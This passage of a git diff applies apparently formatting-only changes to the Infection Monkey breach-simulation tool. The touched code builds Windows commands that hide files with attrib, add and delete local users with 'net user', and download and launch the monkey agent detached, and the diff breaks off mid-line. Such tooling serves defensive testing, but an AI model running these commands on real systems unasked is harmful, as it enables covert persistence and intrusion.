"&&", + "attrib", # change file attributes + "+h", # hidden attribute + "+s", # system attribute + HIDDEN_FILE, + "&&", + "type", HIDDEN_FILE, - '&&', - 'type', - HIDDEN_FILE ] def get_windows_commands_to_hide_folders(): return [ - 'mkdir', + "mkdir", HIDDEN_FOLDER, # make directory - '&&', - 'attrib', - '+h', # hidden attribute - '+s', # system attribute + "&&", + "attrib", + "+h", # hidden attribute + "+s", # system attribute HIDDEN_FOLDER, # change file attributes - '&&', - 'echo', - 'Successfully created hidden folder: {}'.format(HIDDEN_FOLDER), - '>', - '{}\\{}'.format(HIDDEN_FOLDER, 'some-file'), - '&&', - 'type', - '{}\\{}'.format(HIDDEN_FOLDER, 'some-file') + "&&", + "echo", + "Successfully created hidden folder: {}".format(HIDDEN_FOLDER), + ">", + "{}\\{}".format(HIDDEN_FOLDER, "some-file"), + "&&", + "type", + "{}\\{}".format(HIDDEN_FOLDER, "some-file"), ] def get_winAPI_to_hide_files(): import win32file + try: fileAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE # read-write access fileCreation = win32file.CREATE_ALWAYS # overwrite existing file fileFlags = win32file.FILE_ATTRIBUTE_HIDDEN # make hidden - win32file.CreateFile(HIDDEN_FILE_WINAPI, - fileAccess, - 0, # sharing mode: 0 => can't be shared - None, # security attributes - fileCreation, - fileFlags, - 0) # template file + win32file.CreateFile( + HIDDEN_FILE_WINAPI, + fileAccess, + 0, # sharing mode: 0 => can't be shared + None, # security attributes + fileCreation, + fileFlags, + 0, + ) # template file return "Succesfully created hidden file: {}".format(HIDDEN_FILE_WINAPI), True except Exception as err: @@ -66,15 +69,15 @@ def get_winAPI_to_hide_files(): def get_windows_commands_to_delete(): return [ - 'powershell.exe', - 'del', # delete file - '-Force', + "powershell.exe", + "del", # delete file + "-Force", HIDDEN_FILE, - ',', + ",", HIDDEN_FILE_WINAPI, - ';', - 'rmdir', # delete folder - '-Force', - '-Recurse', - HIDDEN_FOLDER + ";", + "rmdir", # delete folder + "-Force", + "-Recurse", + HIDDEN_FOLDER, ] diff --git a/monkey/infection_monkey/utils/windows/users.py b/monkey/infection_monkey/utils/windows/users.py index c16b1c190..9e5913673 100644 --- a/monkey/infection_monkey/utils/windows/users.py +++ b/monkey/infection_monkey/utils/windows/users.py @@ -4,38 +4,25 @@ import subprocess from infection_monkey.utils.auto_new_user import AutoNewUser from infection_monkey.utils.new_user_error import NewUserError -ACTIVE_NO_NET_USER = '/ACTIVE:NO' +ACTIVE_NO_NET_USER = "/ACTIVE:NO" WAIT_TIMEOUT_IN_MILLISECONDS = 60 * 1000 logger = logging.getLogger(__name__) def get_windows_commands_to_add_user(username, password, should_be_active=False): - windows_cmds = [ - 'net', - 'user', - username, - password, - '/add'] + windows_cmds = ["net", "user", username, password, "/add"] if not should_be_active: windows_cmds.append(ACTIVE_NO_NET_USER) return windows_cmds def get_windows_commands_to_delete_user(username): - return [ - 'net', - 'user', - username, - '/delete'] + return ["net", "user", username, "/delete"] def get_windows_commands_to_deactivate_user(username): - return [ - 'net', - 'user', - username, - ACTIVE_NO_NET_USER] + return ["net", "user", username, ACTIVE_NO_NET_USER] class AutoNewWindowsUser(AutoNewUser): @@ -66,7 +53,8 @@ class AutoNewWindowsUser(AutoNewUser): ".", # Use current domain. self.password, win32con.LOGON32_LOGON_INTERACTIVE, # Logon type - interactive (normal user), since we're using a shell. - win32con.LOGON32_PROVIDER_DEFAULT) # Which logon provider to use - whatever Windows offers. + win32con.LOGON32_PROVIDER_DEFAULT, + ) # Which logon provider to use - whatever Windows offers. except Exception as err: raise NewUserError("Can't logon as {}. Error: {}".format(self.username, str(err))) return self @@ -86,22 +74,20 @@ class AutoNewWindowsUser(AutoNewUser): # Open process as that user # https://github.com/tjguk/winsys/blob/master/winsys/_advapi32.py proc_info = _advapi32.CreateProcessWithLogonW( - username=self.username, - domain=".", - password=self.password, - command_line=command + username=self.username, domain=".", password=self.password, command_line=command ) process_handle = proc_info.hProcess thread_handle = proc_info.hThread logger.debug( - "Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)) + "Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS) + ) # https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f-408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject?forum=vcgeneral # Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later. _ = win32event.WaitForSingleObject( # Waits until the specified object is signaled, or time-out. process_handle, # Ping process handle - WAIT_TIMEOUT_IN_MILLISECONDS # Timeout in milliseconds + WAIT_TIMEOUT_IN_MILLISECONDS, # Timeout in milliseconds ) exit_code = win32process.GetExitCodeProcess(process_handle) @@ -131,9 +117,13 @@ class AutoNewWindowsUser(AutoNewUser): try: commands_to_deactivate_user = get_windows_commands_to_deactivate_user(self.username) logger.debug( - "Trying to deactivate {} with commands {}".format(self.username, str(commands_to_deactivate_user))) + "Trying to deactivate {} with commands {}".format( + self.username, str(commands_to_deactivate_user) + ) + ) _ = subprocess.check_output( - commands_to_deactivate_user, stderr=subprocess.STDOUT, shell=True) + commands_to_deactivate_user, stderr=subprocess.STDOUT, shell=True + ) except Exception as err: raise NewUserError("Can't deactivate user {}. Info: {}".format(self.username, err)) @@ -141,8 +131,12 @@ class AutoNewWindowsUser(AutoNewUser): try: commands_to_delete_user = get_windows_commands_to_delete_user(self.username) logger.debug( - "Trying to delete {} with commands {}".format(self.username, str(commands_to_delete_user))) + "Trying to delete {} with commands {}".format( + self.username, str(commands_to_delete_user) + ) + ) _ = subprocess.check_output( - commands_to_delete_user, stderr=subprocess.STDOUT, shell=True) + commands_to_delete_user, stderr=subprocess.STDOUT, shell=True + ) except Exception as err: raise NewUserError("Can't delete user {}. Info: {}".format(self.username, err)) diff --git a/monkey/infection_monkey/windows_upgrader.py b/monkey/infection_monkey/windows_upgrader.py index 8b9ec7f80..cea71a326 100644 --- a/monkey/infection_monkey/windows_upgrader.py +++ b/monkey/infection_monkey/windows_upgrader.py @@ -11,7 +11,7 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline_expl from infection_monkey.model import MONKEY_CMDLINE_WINDOWS from infection_monkey.utils.environment import is_64bit_python, is_64bit_windows_os, is_windows_os -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" LOG = logging.getLogger(__name__) @@ -26,31 +26,45 @@ class WindowsUpgrader(object): @staticmethod def should_upgrade(): - return is_windows_os() and is_64bit_windows_os() \ - and not is_64bit_python() + return is_windows_os() and is_64bit_windows_os() and not is_64bit_python() @staticmethod def upgrade(opts): try: monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False) with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file: - with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file: + with open( + WormConfiguration.dropper_target_path_win_64, "wb" + ) as written_monkey_file: shutil.copyfileobj(downloaded_monkey_file, written_monkey_file) except (IOError, AttributeError) as e: LOG.error("Failed to download the Monkey to the target path: %s." % e) return - monkey_options = build_monkey_commandline_explicitly(opts.parent, opts.tunnel, opts.server, opts.depth) + monkey_options = build_monkey_commandline_explicitly( + opts.parent, opts.tunnel, opts.server, opts.depth + ) - monkey_cmdline = MONKEY_CMDLINE_WINDOWS % { - 'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options + monkey_cmdline = ( + MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64} + + monkey_options + ) - monkey_process = subprocess.Popen(monkey_cmdline, shell=True, - stdin=None, stdout=None, stderr=None, - close_fds=True, creationflags=DETACHED_PROCESS) + monkey_process = subprocess.Popen( + monkey_cmdline, + shell=True, + stdin=None, + stdout=None, + stderr=None, + close_fds=True, + creationflags=DETACHED_PROCESS, + ) - LOG.info("Executed 64bit monkey process (PID=%d) with command line: %s", - monkey_process.pid, monkey_cmdline) + LOG.info( + "Executed 64bit monkey process (PID=%d) with command line: %s", + monkey_process.pid, + monkey_cmdline, + ) time.sleep(WindowsUpgrader.__UPGRADE_WAIT_TIME__) if monkey_process.poll() is not None: diff --git a/monkey/monkey_island/__init__.py b/monkey/monkey_island/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/monkey_island/__init__.py +++ b/monkey/monkey_island/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/monkey_island/cc/__init__.py b/monkey/monkey_island/cc/__init__.py index e593a854b..a37455d11 100644 --- a/monkey/monkey_island/cc/__init__.py +++ b/monkey/monkey_island/cc/__init__.py @@ -1 +1 @@ -__author__ = 'Barak' +__author__ = "Barak" diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index c7fd0006f..846a8663d 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -51,21 +51,25 @@ from monkey_island.cc.services.database import Database from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.services.representations import output_json -__author__ = 'Barak' +__author__ = "Barak" -HOME_FILE = 'index.html' +HOME_FILE = "index.html" def serve_static_file(static_path): - if static_path.startswith('api/'): + if static_path.startswith("api/"): raise NotFound() try: - return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc/ui/dist'), static_path) + return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, "cc/ui/dist"), static_path) except NotFound: # Because react uses various urls for same index page, this is probably the user's intention. if static_path == HOME_FILE: flask_restful.abort( - Response("Page not found. Make sure you ran the npm script and the cwd is monkey\\monkey.", 500)) + Response( + "Page not found. Make sure you ran the npm script and the cwd is monkey\\monkey.", + 500, + ) + ) return serve_home() @@ -74,17 +78,17 @@ def serve_home(): def init_app_config(app, mongo_url): - app.config['MONGO_URI'] = mongo_url + app.config["MONGO_URI"] = mongo_url # See https://flask-jwt-extended.readthedocs.io/en/stable/options - app.config['JWT_ACCESS_TOKEN_EXPIRES'] = env_singleton.env.get_auth_expiration_time() + app.config["JWT_ACCESS_TOKEN_EXPIRES"] = env_singleton.env.get_auth_expiration_time() # Invalidate the signature of JWTs if the server process restarts. This avoids the edge case of getting a JWT, # deciding to reset credentials and then still logging in with the old JWT. - app.config['JWT_SECRET_KEY'] = str(uuid.uuid4()) + app.config["JWT_SECRET_KEY"] = str(uuid.uuid4()) # By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK matrix in the # configuration. See https://flask.palletsprojects.com/en/1.1.x/config/#JSON_SORT_KEYS. - app.config['JSON_SORT_KEYS'] = False + app.config["JSON_SORT_KEYS"] = False app.json_encoder = CustomJSONEncoder @@ -102,62 +106,71 @@ def init_app_services(app): def init_app_url_rules(app): - app.add_url_rule('/', 'serve_home', serve_home) - app.add_url_rule('/', 'serve_static_file', serve_static_file) + app.add_url_rule("/", "serve_home", serve_home) + app.add_url_rule("/", "serve_static_file", serve_static_file) def init_api_resources(api): - api.add_resource(Root, '/api') - api.add_resource(Registration, '/api/registration') - api.add_resource(Authenticate, '/api/auth') - api.add_resource(Environment, '/api/environment') - api.add_resource(Monkey, '/api/monkey', '/api/monkey/', '/api/monkey/') - api.add_resource(Bootloader, '/api/bootloader/') - api.add_resource(LocalRun, '/api/local-monkey', '/api/local-monkey/') - api.add_resource(ClientRun, '/api/client-monkey', '/api/client-monkey/') - api.add_resource(Telemetry, '/api/telemetry', '/api/telemetry/', '/api/telemetry/') - api.add_resource(MonkeyConfiguration, '/api/configuration', '/api/configuration/') - api.add_resource(IslandConfiguration, '/api/configuration/island', '/api/configuration/island/') - api.add_resource(MonkeyDownload, '/api/monkey/download', '/api/monkey/download/', - '/api/monkey/download/') - api.add_resource(NetMap, '/api/netmap', '/api/netmap/') - api.add_resource(Edge, '/api/netmap/edge', '/api/netmap/edge/') - api.add_resource(Node, '/api/netmap/node', '/api/netmap/node/') - api.add_resource(NodeStates, '/api/netmap/nodeStates') + api.add_resource(Root, "/api") + api.add_resource(Registration, "/api/registration") + api.add_resource(Authenticate, "/api/auth") + api.add_resource(Environment, "/api/environment") + api.add_resource(Monkey, "/api/monkey", "/api/monkey/", "/api/monkey/") + api.add_resource(Bootloader, "/api/bootloader/") + api.add_resource(LocalRun, "/api/local-monkey", "/api/local-monkey/") + api.add_resource(ClientRun, "/api/client-monkey", "/api/client-monkey/") + api.add_resource( + Telemetry, "/api/telemetry", "/api/telemetry/", "/api/telemetry/" + ) + api.add_resource(MonkeyConfiguration, "/api/configuration", "/api/configuration/") + api.add_resource(IslandConfiguration, "/api/configuration/island", "/api/configuration/island/") + api.add_resource( + MonkeyDownload, + "/api/monkey/download", + "/api/monkey/download/", + "/api/monkey/download/", + ) + api.add_resource(NetMap, "/api/netmap", "/api/netmap/") + api.add_resource(Edge, "/api/netmap/edge", "/api/netmap/edge/") + api.add_resource(Node, "/api/netmap/node", "/api/netmap/node/") + api.add_resource(NodeStates, "/api/netmap/nodeStates") - api.add_resource(SecurityReport, '/api/report/security') - api.add_resource(ZeroTrustReport, '/api/report/zero-trust/') - api.add_resource(AttackReport, '/api/report/attack') + api.add_resource(SecurityReport, "/api/report/security") + api.add_resource(ZeroTrustReport, "/api/report/zero-trust/") + api.add_resource(AttackReport, "/api/report/attack") - api.add_resource(ZeroTrustFindingEvent, '/api/zero-trust/finding-event/') - api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/') - api.add_resource(Log, '/api/log', '/api/log/') - api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/') - api.add_resource(PBAFileDownload, '/api/pba/download/') + api.add_resource(ZeroTrustFindingEvent, "/api/zero-trust/finding-event/") + api.add_resource(TelemetryFeed, "/api/telemetry-feed", "/api/telemetry-feed/") + api.add_resource(Log, "/api/log", "/api/log/") + api.add_resource(IslandLog, "/api/log/island/download", "/api/log/island/download/") + api.add_resource(PBAFileDownload, "/api/pba/download/") api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH) - api.add_resource(FileUpload, '/api/fileUpload/', - '/api/fileUpload/?load=', - '/api/fileUpload/?restore=') - api.add_resource(RemoteRun, '/api/remote-monkey', '/api/remote-monkey/') - api.add_resource(AttackConfiguration, '/api/attack') - api.add_resource(VersionUpdate, '/api/version-update', '/api/version-update/') - api.add_resource(RemotePortCheck, '/api/monkey_control/check_remote_port/') - api.add_resource(StartedOnIsland, '/api/monkey_control/started_on_island') - api.add_resource(ScoutSuiteAuth, '/api/scoutsuite_auth/') - api.add_resource(AWSKeys, '/api/aws_keys') + api.add_resource( + FileUpload, + "/api/fileUpload/", + "/api/fileUpload/?load=", + "/api/fileUpload/?restore=", + ) + api.add_resource(RemoteRun, "/api/remote-monkey", "/api/remote-monkey/") + api.add_resource(AttackConfiguration, "/api/attack") + api.add_resource(VersionUpdate, "/api/version-update", "/api/version-update/") + api.add_resource(RemotePortCheck, "/api/monkey_control/check_remote_port/") + api.add_resource(StartedOnIsland, "/api/monkey_control/started_on_island") + api.add_resource(ScoutSuiteAuth, "/api/scoutsuite_auth/") + api.add_resource(AWSKeys, "/api/aws_keys") # Resources used by black box tests - api.add_resource(MonkeyTest, '/api/test/monkey') - api.add_resource(ClearCaches, '/api/test/clear_caches') - api.add_resource(LogTest, '/api/test/log') - api.add_resource(TelemetryTest, '/api/test/telemetry') + api.add_resource(MonkeyTest, "/api/test/monkey") + api.add_resource(ClearCaches, "/api/test/clear_caches") + api.add_resource(LogTest, "/api/test/log") + api.add_resource(TelemetryTest, "/api/test/telemetry") def init_app(mongo_url): app = Flask(__name__) api = flask_restful.Api(app) - api.representations = {'application/json': output_json} + api.representations = {"application/json": output_json} init_app_config(app, mongo_url) init_app_services(app) diff --git a/monkey/monkey_island/cc/arg_parser.py b/monkey/monkey_island/cc/arg_parser.py index 5ea12aec4..73b145dd4 100644 --- a/monkey/monkey_island/cc/arg_parser.py +++ b/monkey/monkey_island/cc/arg_parser.py @@ -1,6 +1,9 @@ from dataclasses import dataclass -from monkey_island.cc.server_utils.consts import DEFAULT_SERVER_CONFIG_PATH, DEFAULT_LOGGER_CONFIG_PATH +from monkey_island.cc.server_utils.consts import ( + DEFAULT_SERVER_CONFIG_PATH, + DEFAULT_LOGGER_CONFIG_PATH, +) @dataclass @@ -15,7 +18,7 @@ def parse_cli_args() -> IslandArgs: parser = argparse.ArgumentParser( description="Infection Monkey Island CnC Server. See https://infectionmonkey.com", - formatter_class=argparse.ArgumentDefaultsHelpFormatter + formatter_class=argparse.ArgumentDefaultsHelpFormatter, ) parser.add_argument( "-s", diff --git a/monkey/monkey_island/cc/database.py b/monkey/monkey_island/cc/database.py index 082553e5f..b7788178c 100644 --- a/monkey/monkey_island/cc/database.py +++ b/monkey/monkey_island/cc/database.py @@ -2,7 +2,7 @@ import gridfs from flask_pymongo import MongoClient, PyMongo from pymongo.errors import ServerSelectionTimeoutError -__author__ = 'Barak' +__author__ = "Barak" mongo = PyMongo() @@ -34,5 +34,5 @@ def get_db_version(mongo_url): :return: version as a tuple (e.g. `(u'4', u'0', u'8')`) """ client = MongoClient(mongo_url, serverSelectionTimeoutMS=100) - server_version = tuple(client.server_info()['version'].split('.')) + server_version = tuple(client.server_info()["version"].split(".")) return server_version diff --git a/monkey/monkey_island/cc/environment/__init__.py b/monkey/monkey_island/cc/environment/__init__.py index 75012183f..612428428 100644 --- a/monkey/monkey_island/cc/environment/__init__.py +++ b/monkey/monkey_island/cc/environment/__init__.py @@ -4,10 +4,13 @@ import os from abc import ABCMeta, abstractmethod from datetime import timedelta -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" -from common.utils.exceptions import (AlreadyRegisteredError, CredentialsNotRequiredError, - InvalidRegistrationCredentialsError) +from common.utils.exceptions import ( + AlreadyRegisteredError, + CredentialsNotRequiredError, + InvalidRegistrationCredentialsError, +) from monkey_island.cc.environment.environment_config import EnvironmentConfig from monkey_island.cc.environment.user_creds import UserCreds @@ -19,8 +22,10 @@ class Environment(object, metaclass=ABCMeta): _MONGO_DB_NAME = "monkeyisland" _MONGO_DB_HOST = "localhost" _MONGO_DB_PORT = 27017 - _MONGO_URL = os.environ.get("MONKEY_MONGO_URL", - "mongodb://{0}:{1}/{2}".format(_MONGO_DB_HOST, _MONGO_DB_PORT, str(_MONGO_DB_NAME))) + _MONGO_URL = os.environ.get( + "MONKEY_MONGO_URL", + "mongodb://{0}:{1}/{2}".format(_MONGO_DB_HOST, _MONGO_DB_PORT, str(_MONGO_DB_NAME)), + ) _DEBUG_SERVER = False _AUTH_EXPIRATION_TIME = timedelta(minutes=30) @@ -56,12 +61,14 @@ class Environment(object, metaclass=ABCMeta): def _try_needs_registration(self) -> bool: if not self._credentials_required: - raise CredentialsNotRequiredError("Credentials are not required " - "for current environment.") + raise CredentialsNotRequiredError( + "Credentials are not required " "for current environment." + ) else: if self._is_registered(): - raise AlreadyRegisteredError("User has already been registered. " - "Reset credentials or login.") + raise AlreadyRegisteredError( + "User has already been registered. " "Reset credentials or login." + ) return True def _is_registered(self) -> bool: @@ -102,11 +109,11 @@ class Environment(object, metaclass=ABCMeta): @staticmethod def hash_secret(secret): hash_obj = hashlib.sha3_512() - hash_obj.update(secret.encode('utf-8')) + hash_obj.update(secret.encode("utf-8")) return hash_obj.hexdigest() def get_deployment(self) -> str: - deployment = 'unknown' + deployment = "unknown" if self._config and self._config.deployment: deployment = self._config.deployment return deployment diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py index b1ba0a734..89e7b428d 100644 --- a/monkey/monkey_island/cc/environment/aws.py +++ b/monkey/monkey_island/cc/environment/aws.py @@ -1,7 +1,7 @@ from common.cloud.aws.aws_instance import AwsInstance from monkey_island.cc.environment import Environment -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class AwsEnvironment(Environment): diff --git a/monkey/monkey_island/cc/environment/environment_config.py b/monkey/monkey_island/cc/environment/environment_config.py index f390d8186..731ecfe34 100644 --- a/monkey/monkey_island/cc/environment/environment_config.py +++ b/monkey/monkey_island/cc/environment/environment_config.py @@ -40,9 +40,7 @@ class EnvironmentConfig: def _load_from_dict(self, dict_data: Dict): user_creds = UserCreds.get_from_dict(dict_data) aws = dict_data["aws"] if "aws" in dict_data else None - data_dir = ( - dict_data["data_dir"] if "data_dir" in dict_data else DEFAULT_DATA_DIR - ) + data_dir = dict_data["data_dir"] if "data_dir" in dict_data else DEFAULT_DATA_DIR self.server_config = dict_data["server_config"] self.deployment = dict_data["deployment"] diff --git a/monkey/monkey_island/cc/environment/environment_singleton.py b/monkey/monkey_island/cc/environment/environment_singleton.py index 0c7262a96..e7e316ac5 100644 --- a/monkey/monkey_island/cc/environment/environment_singleton.py +++ b/monkey/monkey_island/cc/environment/environment_singleton.py @@ -1,22 +1,21 @@ import logging import monkey_island.cc.resources.auth.user_store as user_store -from monkey_island.cc.environment import (EnvironmentConfig, aws, password, - standard) +from monkey_island.cc.environment import EnvironmentConfig, aws, password, standard from monkey_island.cc.server_utils.consts import DEFAULT_SERVER_CONFIG_PATH -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) -AWS = 'aws' -STANDARD = 'standard' -PASSWORD = 'password' +AWS = "aws" +STANDARD = "standard" +PASSWORD = "password" ENV_DICT = { STANDARD: standard.StandardEnvironment, AWS: aws.AwsEnvironment, - PASSWORD: password.PasswordEnvironment + PASSWORD: password.PasswordEnvironment, } env = None @@ -32,8 +31,8 @@ def set_to_standard(): global env if env: env_config = env.get_config() - env_config.server_config = 'standard' - set_env('standard', env_config) + env_config.server_config = "standard" + set_env("standard", env_config) env.save_config() user_store.UserStore.set_users(env.get_auth_users()) @@ -45,9 +44,9 @@ def initialize_from_file(file_path): __env_type = config.server_config set_env(__env_type, config) # noinspection PyUnresolvedReferences - logger.info('Monkey\'s env is: {0}'.format(env.__class__.__name__)) + logger.info("Monkey's env is: {0}".format(env.__class__.__name__)) except Exception: - logger.error('Failed initializing environment', exc_info=True) + logger.error("Failed initializing environment", exc_info=True) raise diff --git a/monkey/monkey_island/cc/environment/password.py b/monkey/monkey_island/cc/environment/password.py index 8cfd495d2..88d1f76f0 100644 --- a/monkey/monkey_island/cc/environment/password.py +++ b/monkey/monkey_island/cc/environment/password.py @@ -1,6 +1,6 @@ from monkey_island.cc.environment import Environment -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class PasswordEnvironment(Environment): diff --git a/monkey/monkey_island/cc/environment/set_server_config.py b/monkey/monkey_island/cc/environment/set_server_config.py index f3fbd66ff..490d92479 100644 --- a/monkey/monkey_island/cc/environment/set_server_config.py +++ b/monkey/monkey_island/cc/environment/set_server_config.py @@ -62,5 +62,5 @@ def restore_previous_config(config_path): move(BACKUP_CONFIG_FILENAME, config_path) -if __name__ == '__main__': +if __name__ == "__main__": main() diff --git a/monkey/monkey_island/cc/environment/standard.py b/monkey/monkey_island/cc/environment/standard.py index e34fb71cc..8135e8e3f 100644 --- a/monkey/monkey_island/cc/environment/standard.py +++ b/monkey/monkey_island/cc/environment/standard.py @@ -1,7 +1,7 @@ from monkey_island.cc.environment import Environment from monkey_island.cc.resources.auth.auth_user import User -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class StandardEnvironment(Environment): @@ -9,8 +9,10 @@ class StandardEnvironment(Environment): _credentials_required = False # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()' - NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \ - '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557' + NO_AUTH_CREDS = ( + "55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062" + "8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557" + ) def get_auth_users(self): return [User(1, StandardEnvironment.NO_AUTH_CREDS, StandardEnvironment.NO_AUTH_CREDS)] diff --git a/monkey/monkey_island/cc/environment/test__init__.py b/monkey/monkey_island/cc/environment/test__init__.py index fde0a8b27..aea1263c2 100644 --- a/monkey/monkey_island/cc/environment/test__init__.py +++ b/monkey/monkey_island/cc/environment/test__init__.py @@ -5,22 +5,23 @@ from unittest import TestCase from unittest.mock import MagicMock, patch from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH -from common.utils.exceptions import (AlreadyRegisteredError, - CredentialsNotRequiredError, - InvalidRegistrationCredentialsError, - RegistrationNotNeededError) -from monkey_island.cc.environment import (Environment, EnvironmentConfig, - UserCreds) +from common.utils.exceptions import ( + AlreadyRegisteredError, + CredentialsNotRequiredError, + InvalidRegistrationCredentialsError, + RegistrationNotNeededError, +) +from monkey_island.cc.environment import Environment, EnvironmentConfig, UserCreds TEST_RESOURCES_DIR = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "testing", "environment") WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_with_credentials.json") NO_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_no_credentials.json") PARTIAL_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_partial_credentials.json") -STANDARD_WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, - "server_config_standard_with_credentials.json") -STANDARD_ENV = os.path.join(TEST_RESOURCES_DIR, - "server_config_standard_env.json") +STANDARD_WITH_CREDENTIALS = os.path.join( + TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json" +) +STANDARD_ENV = os.path.join(TEST_RESOURCES_DIR, "server_config_standard_env.json") def get_tmp_file(): @@ -40,14 +41,13 @@ class StubEnvironmentConfig(EnvironmentConfig): def get_server_config_file_path_test_version(): - return os.path.join(os.getcwd(), 'test_config.json') + return os.path.join(os.getcwd(), "test_config.json") class TestEnvironment(TestCase): - class EnvironmentCredentialsNotRequired(Environment): def __init__(self): - config = StubEnvironmentConfig('test', 'test', UserCreds()) + config = StubEnvironmentConfig("test", "test", UserCreds()) super().__init__(config) _credentials_required = False @@ -57,7 +57,7 @@ class TestEnvironment(TestCase): class EnvironmentCredentialsRequired(Environment): def __init__(self): - config = StubEnvironmentConfig('test', 'test', UserCreds()) + config = StubEnvironmentConfig("test", "test", UserCreds()) super().__init__(config) _credentials_required = True @@ -67,7 +67,7 @@ class TestEnvironment(TestCase): class EnvironmentAlreadyRegistered(Environment): def __init__(self): - config = StubEnvironmentConfig('test', 'test', UserCreds('test_user', 'test_secret')) + config = StubEnvironmentConfig("test", "test", UserCreds("test_user", "test_secret")) super().__init__(config) _credentials_required = True @@ -131,7 +131,9 @@ class TestEnvironment(TestCase): env = TestEnvironment.EnvironmentCredentialsNotRequired() self._test_bool_env_method("_is_credentials_set_up", env, STANDARD_ENV, False) - def _test_bool_env_method(self, method_name: str, env: Environment, config: Dict, expected_result: bool): + def _test_bool_env_method( + self, method_name: str, env: Environment, config: Dict, expected_result: bool + ): env._config = EnvironmentConfig(config) method = getattr(env, method_name) if expected_result: diff --git a/monkey/monkey_island/cc/environment/test_environment_config.py b/monkey/monkey_island/cc/environment/test_environment_config.py index de941a6f3..d2ac052c7 100644 --- a/monkey/monkey_island/cc/environment/test_environment_config.py +++ b/monkey/monkey_island/cc/environment/test_environment_config.py @@ -9,17 +9,11 @@ from monkey_island.cc.environment.environment_config import EnvironmentConfig from monkey_island.cc.environment.user_creds import UserCreds -TEST_RESOURCES_DIR = os.path.join( - MONKEY_ISLAND_ABS_PATH, "cc", "testing", "environment" -) +TEST_RESOURCES_DIR = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "testing", "environment") -WITH_CREDENTIALS = os.path.join( - TEST_RESOURCES_DIR, "server_config_with_credentials.json" -) +WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_with_credentials.json") NO_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_no_credentials.json") -PARTIAL_CREDENTIALS = os.path.join( - TEST_RESOURCES_DIR, "server_config_partial_credentials.json" -) +PARTIAL_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_partial_credentials.json") STANDARD_WITH_CREDENTIALS = os.path.join( TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json" ) diff --git a/monkey/monkey_island/cc/environment/test_user_creds.py b/monkey/monkey_island/cc/environment/test_user_creds.py index 18c052526..93da16e24 100644 --- a/monkey/monkey_island/cc/environment/test_user_creds.py +++ b/monkey/monkey_island/cc/environment/test_user_creds.py @@ -4,19 +4,18 @@ from monkey_island.cc.environment.user_creds import UserCreds class TestUserCreds(TestCase): - def test_to_dict(self): user_creds = UserCreds() self.assertDictEqual(user_creds.to_dict(), {}) user_creds = UserCreds(username="Test") - self.assertDictEqual(user_creds.to_dict(), {'user': "Test"}) + self.assertDictEqual(user_creds.to_dict(), {"user": "Test"}) user_creds = UserCreds(password_hash="abc1231234") - self.assertDictEqual(user_creds.to_dict(), {'password_hash': "abc1231234"}) + self.assertDictEqual(user_creds.to_dict(), {"password_hash": "abc1231234"}) user_creds = UserCreds(username="Test", password_hash="abc1231234") - self.assertDictEqual(user_creds.to_dict(), {'user': "Test", 'password_hash': "abc1231234"}) + self.assertDictEqual(user_creds.to_dict(), {"user": "Test", "password_hash": "abc1231234"}) def test_to_auth_user(self): user_creds = UserCreds(username="Test", password_hash="abc1231234") diff --git a/monkey/monkey_island/cc/environment/user_creds.py b/monkey/monkey_island/cc/environment/user_creds.py index 7d6ca4962..98a23a14a 100644 --- a/monkey/monkey_island/cc/environment/user_creds.py +++ b/monkey/monkey_island/cc/environment/user_creds.py @@ -7,7 +7,6 @@ from 